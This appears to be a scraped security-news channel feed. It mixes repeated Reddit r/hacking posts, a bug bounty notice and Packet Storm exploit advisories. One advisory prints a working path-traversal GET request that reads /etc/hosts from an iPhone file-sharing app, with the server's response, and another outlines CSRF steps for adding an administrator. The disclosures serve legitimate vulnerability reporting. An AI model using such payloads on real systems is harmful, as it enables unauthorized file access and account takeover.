Dark Reading: Attacks/Breaches
Defenders Be Prepared: Cyberattacks Surge Against Linux Amid Cloud Migration
Ransomware in particular poses a major threat, but security vendors say there has been an increase in Linux-targeted cryptojacking, malware, and vulnerability exploits as well, and defenders need to be ready.
Defenders Be Prepared: Cyberattacks Surge Against Linux Amid Cloud Migration
Ransomware in particular poses a major threat, but security vendors say there has been an increase in Linux-targeted cryptojacking, malware, and vulnerability exploits as well, and defenders need to be ready.
hacking: security in practice
DNS brute force enumerate
Hi to everyone, I've been using Gobuster DNS to enumerate subdomains, but I see other people using other tools and getting more interesting things than me. Which tool is the best to enumerate subdomains using dictionaries? Do you recommend any command in specific?
submitted by /u/Former_Ad2083
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
DNS brute force enumerate
Hi to everyone, I've been using Gobuster DNS to enumerate subdomains, but I see other people using other tools and getting more interesting things than me. Which tool is the best to enumerate subdomains using dictionaries? Do you recommend any command in specific?
submitted by /u/Former_Ad2083
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
DNS brute force enumerate
Hi to everyone, I've been using Gobuster DNS to enumerate subdomains, but I see other people using other tools and getting more interesting things...
hacking: security in practice
Why do you go to hackercons and what do you love about them? Is there anything you haven't see you wish would be implemented?
As the title suggests, curious about why people go to hackercons, what they hope to get out of them, what they love about them and things you'd like to see more of at cons. :)
submitted by /u/square_wave_
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Why do you go to hackercons and what do you love about them? Is there anything you haven't see you wish would be implemented?
As the title suggests, curious about why people go to hackercons, what they hope to get out of them, what they love about them and things you'd like to see more of at cons. :)
submitted by /u/square_wave_
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Why do you go to hackercons and what do you love about them? Is...
As the title suggests, curious about why people go to hackercons, what they hope to get out of them, what they love about them and things you'd...
hacking: security in practice
What's your workflow/what software do you use for re/pwn?
I'm interested in how other people work so maybe I can borrow some ideas. Personally I'm mostly interested in ctfs and I only use Ghidra, Gdb with pwndbg and a text editor (currently using emacs). When the Ghidra decompiler is hard to understand I sometimes paste the binary into dogbolt to look at the hexrays decompiler.
I thought about using Radare a lot but its hard to find a use case for it... for static analysis I already use Ghidra, even though Radare can use the Ghidra decompiler for me it looks like its better integrated in Ghidra. For dynamic analysis Gdb with pwndbg feels faster for inspecting the stack etc.
Now I'm thinking about learning angr and frida. I'm writing this post partially to check how popular and useful those are among other people, hah.
submitted by /u/fullcoomer_human
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
What's your workflow/what software do you use for re/pwn?
I'm interested in how other people work so maybe I can borrow some ideas. Personally I'm mostly interested in ctfs and I only use Ghidra, Gdb with pwndbg and a text editor (currently using emacs). When the Ghidra decompiler is hard to understand I sometimes paste the binary into dogbolt to look at the hexrays decompiler.
I thought about using Radare a lot but its hard to find a use case for it... for static analysis I already use Ghidra, even though Radare can use the Ghidra decompiler for me it looks like its better integrated in Ghidra. For dynamic analysis Gdb with pwndbg feels faster for inspecting the stack etc.
Now I'm thinking about learning angr and frida. I'm writing this post partially to check how popular and useful those are among other people, hah.
submitted by /u/fullcoomer_human
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
What's your workflow/what software do you use for re/pwn?
I'm interested in how other people work so maybe I can borrow some ideas. Personally I'm mostly interested in ctfs and I only use Ghidra, Gdb with...
hacking: security in practice
How hard is to shut down tor websites?
Dark web markets are thriving with drugs, guns and even human slaves. How hard for governments to shut them down? These websites got to be in someones computer or server. Is it hard to track? Is there a government who does not cooperate with others and let's this kind of shit happen under their jurisdiction?
UPD: Can't you just block the entire tor network for the country?
submitted by /u/1Blue3Brown
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How hard is to shut down tor websites?
Dark web markets are thriving with drugs, guns and even human slaves. How hard for governments to shut them down? These websites got to be in someones computer or server. Is it hard to track? Is there a government who does not cooperate with others and let's this kind of shit happen under their jurisdiction?
UPD: Can't you just block the entire tor network for the country?
submitted by /u/1Blue3Brown
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
reddit.com: over 18?
Reddit gives you the best of the internet in one place. Get a constantly updating feed of breaking news, fun stories, pics, memes, and videos just for you. Passionate about something niche? Reddit has thousands of vibrant communities with people that share…
New Bug Bounty Alert: Welcome InsureDAO
https://hatsfinance.medium.com/new-bug-bounty-alert-welcome-insuredao-3868d2bdad48?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://hatsfinance.medium.com/new-bug-bounty-alert-welcome-insuredao-3868d2bdad48?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
New Bug Bounty Alert: Welcome InsureDAO
A new partnership with InsureDAO begins! A couple months back we announced our beginner partnership with InsureDAO allowing projects to be…
A new partnership with InsureDAO begins! A couple months back we announced our beginner partnership with InsureDAO allowing projects to be…Continue reading on Medium » (https://hatsfinance.medium.com/new-bug-bounty-alert-welcome-insuredao-3868d2bdad48?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
New Bug Bounty Alert: Welcome InsureDAO
A new partnership with InsureDAO begins! A couple months back we announced our beginner partnership with InsureDAO allowing projects to be…
KitPloit - PenTest Tools!
noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User
___________________________
@hacking_Attack
@Hacking_Video
noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
123elf Project Buffer Overflow
https://2.bp.blogspot.com/-swqN45HZtSI/WWlvXv0Z4fI/AAAAAAAAIOY/czRV0nNAPTIk5N0xfOCTXuQJzRjI48a4wCLcBGAs/s1600/h53.png
A stack buffer overflow was reported in the cell format processing routines for 123elf, a project that brings Lotus 1-2-3 to Linux. If a victim opens an untrusted malicious worksheet, code execution could occur.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
123elf Project Buffer Overflow
https://2.bp.blogspot.com/-swqN45HZtSI/WWlvXv0Z4fI/AAAAAAAAIOY/czRV0nNAPTIk5N0xfOCTXuQJzRjI48a4wCLcBGAs/s1600/h53.png
A stack buffer overflow was reported in the cell format processing routines for 123elf, a project that brings Lotus 1-2-3 to Linux. If a victim opens an untrusted malicious worksheet, code execution could occur.
SHA-256 |
5476d681c79c06b3da58fefb626a51d12aa1fe3643baa4e0015d28e482653efbDownload
# About
The 123 command is a spreadsheet application for UNIX-based systems that
can be used in interactive mode to create and modify financial and
scientific models.
For more information, see https://123r3.net
# Advisory
A stack buffer overflow was reported in the cell format processing
routines. If a victim opens an untrusted malicious worksheet, code
execution could occur.
There have been no reports of this vulnerability being exploited in the wild.
We take your security very seriously, in fact, this is the first known
vulnerability reported in Lotus 1-2-3 R3 since it's release in September
1990.
# Credit
This issue was reported to the 123elf project by dbastone.
# Solution
A new release has been prepared to resolve this issue, we recommend
affected users upgrade immediately.
https://github.com/taviso/123elf/
Lotus 1-2-3 releases for other platforms are affected, but are not
actively maintained. MS-DOS, OS/2, OpenVMS, z/OS and SysV/386 users are
advised to migrate to Linux to continue receiving updates.
--
_o) $ lynx lock.cmpxchg8b.com
/\\ _o) _o) $ finger taviso@sdf.org
_\_V _( ) _( ) @taviso
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
123elf Project Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Employee Leave Management System 1.0 Cross Site Request Forgery
https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
Online Employee Leave Management System version 1.0 suffers from a cross site request forgery vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Employee Leave Management System 1.0 Cross Site Request Forgery
https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
Online Employee Leave Management System version 1.0 suffers from a cross site request forgery vulnerability.
SHA-256 |
0710715d45689c909a85c5900c640070b5bf1573e0e7b5eaa10c502265e786a4Download
# Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)
# Date: 05/09/2022
# Exploit Author: Amolo Hunters
# Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux
Title:
================
Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)
Summary:
================
The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges.
Severity Level:
================
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Affected Product:
================
Online Employee Leave Management System v1.0
Steps to Reproduce:
================
1. Create an HTML file and paste the following code:
Online Employee Leave Management System (addemployee.php) CSRF PoC
Online Employee Leave Management System (addemployee.php) CSRF PoC
by Amolo Hunters
2. Save the file and run it in the browser
Note: you need to be logged in as an administrator
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Employee Leave Management System 1.0 Cross Site Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Wifi HD Wireless Disk Drive 11 Local File Inclusion
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
Wifi HD Wireless Disk Drive version 11 suffers from a local file inclusion vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Wifi HD Wireless Disk Drive 11 Local File Inclusion
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
Wifi HD Wireless Disk Drive version 11 suffers from a local file inclusion vulnerability.
SHA-256 |
b20518edc15d62d991e82375c15b066d88b50865b9271eeedc4ac3a8e580a204Download
# Exploit Title: Wifi HD Wireless Disk Drive Local File Inclusion
# Date: Aug 13, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.savysoda.com
# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/
id311170976
# Version: 11
# Tested on: iPhone OS 15_5
GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.100
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1
Referer: http://192.168.1.103/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
-----------------
HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Type: application/download
Content-Length: 213
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 03:33:30 GMT
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Wifi HD Wireless Disk Drive 11 Local File Inclusion
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
A young “Tony” planning his next software program.
https://cdn-images-1.medium.com/max/600/1*3_o-rJ9ONp6oNKVjttnTsg.png
Can anyone figure out what I was trying to do?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
A young “Tony” planning his next software program.
https://cdn-images-1.medium.com/max/600/1*3_o-rJ9ONp6oNKVjttnTsg.png
Can anyone figure out what I was trying to do?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
A young “Tony” planning his next software program.
Can anyone figure out what I was trying to do?